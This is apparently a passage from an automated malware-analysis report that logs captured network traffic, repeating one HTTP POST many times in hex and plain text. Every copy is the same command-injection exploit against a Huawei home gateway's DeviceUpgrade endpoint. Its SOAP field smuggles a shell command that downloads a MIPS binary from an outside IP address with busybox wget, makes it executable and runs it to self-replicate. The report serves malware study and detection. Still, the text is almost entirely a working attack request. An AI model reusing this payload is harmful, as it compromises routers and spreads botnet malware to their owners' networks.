6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
